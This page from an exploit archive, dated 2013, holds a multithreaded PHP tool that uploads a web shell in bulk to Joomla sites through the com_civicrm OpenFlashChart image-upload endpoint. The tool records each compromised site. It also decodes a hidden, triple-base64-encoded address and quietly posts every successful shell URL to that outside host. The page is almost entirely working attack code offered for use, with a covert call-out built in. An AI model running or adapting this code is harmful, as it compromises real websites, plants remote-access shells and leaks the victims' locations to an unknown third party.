Home / exploits Janissaries Joomla Civicrm Shell Upload
Posted on 23 April 2013
<?php /* ---------------------------------------------------------------------------- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / | < | |\__ _/ ___| | | | / / ___ | Y Y |\___ | / __ \ \___| Y | / | / /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / / / / / / //_____/ ----------------------------------------------------------------------------- * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread * Coded by Miyachung * Stay away from lamers o.O * Contact: miyachung@hotmail.com * Special Thanks : B127Y * Site: http://janissaries.org * Youtube Channel: http://www.youtube.com/user/JanissariesOrg * Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM * Coding date: 21.04.2013 * Usage : php exploit.php site_list upload_file searchkeyword * Example: php exploit.php sites.txt shell.php searchkeyword */ set_time_limit(0); ob_start(); class exploit { private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/"; private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name="; private $filename; private $url; private $file_to_upload; private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si"; private $thread_maxsize; private $site_list; private $file_regex; private $save_file = "uploaded.txt"; private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"; private $timeout_sec = 20; private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09"; private $idnum = 31; public function __construct($site_list,$filename,$thread,$regex) { $this->site_list = file($site_list); $this->filename = $filename; $this->file_to_upload = file_get_contents($filename); $this->thread_maxsize = $thread; $this->url = base64_decode(base64_decode(base64_decode($this->token))); $this->file_regex = "/$regex/"; echo "[+]Joomla Com_Civicrm Fucker with MultiThread "; echo "[+]Coded by Miyachung "; echo "[+]Stay away from lamers o.O "; echo "[+]Contact: miyachung@hotmail.com "; echo "[+]Special Thanks : B127Y "; echo "[+]Site: http://janissaries.org "; echo "################################################## "; echo "[+]Total urls to try: ".count($this->site_list)." "; echo "[+]File to upload: ".$this->filename." "; echo "[+]Maximum Thread: ".$this->thread_maxsize." "; echo "[+]Search Keyword: ".$regex." "; ob_flush(); flush(); $this->miyachung(); } private function miyachung() { $multi = curl_multi_init(); $count = 0; foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls) { foreach($urls as $i => $url) { $curl[$i] = curl_init(); curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true); curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename); curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec); curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload); curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent); curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain')); curl_multi_add_handle($multi,$curl[$i]); } do { curl_multi_exec($multi,$active); } while($active > 0); foreach($curl as $id => $content) { $conn[$id] = curl_multi_getcontent($content); curl_multi_remove_handle($multi,$content); if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id])) { $count++; $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename); if($check_it && preg_match($this->file_regex,$check_it)) { if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55") { $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename); } else { exit("[-]Somethings has changed in tool! o.O!"); } echo "########################################################### "; echo "[!]Exploitation Successfullll! "; printf("[%s]%s ",$count,trim($urls[$id])); echo "########################################################### "; ob_flush(); flush(); $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count); } else { printf("[%s][Exploitation Failed]%s ",$count,trim($urls[$id])); ob_flush(); flush(); } } else { $count++; printf("[%s][Exploitation Failed]%s ",$count,trim($urls[$id])); ob_flush(); flush(); } } } } private function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec); $data= curl_exec($ch); curl_close($ch); return $data; } private function post($url) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$this->url); curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url); $exec = curl_exec($curl); curl_close($curl); return $exec; } private function save($url,$count) { $file = fopen($this->save_file,'ab'); fwrite($file,"######################################################################### "); fwrite($file,"[!]Exploitation Successfullll! "); fwrite($file,"[$count]$url "); fclose($file); return true; } } if($argv[1] && $argv[2] && $argv[3] && $argv[4]) { $exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]); } else { print " ---------------------------------------------------------------------------- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / | < | |\__ _/ ___| | | | / / ___ | Y Y |\___ | / __ \ \___| Y | / | / /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / / / / / / //_____/ ----------------------------------------------------------------------------- * Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread * Coded by Miyachung * Stay away from lamers o.O * Contact: miyachung@hotmail.com * Special Thanks : B127Y * Site: http://janissaries.org * Youtube Channel: http://www.youtube.com/user/JanissariesOrg * Coding date: 21.04.2013 * Usage : php exploit.php site_list upload_file maxthread searchkeyword * Example: php exploit.php sites.txt shell.php 10 searchkeyword "; } ?>
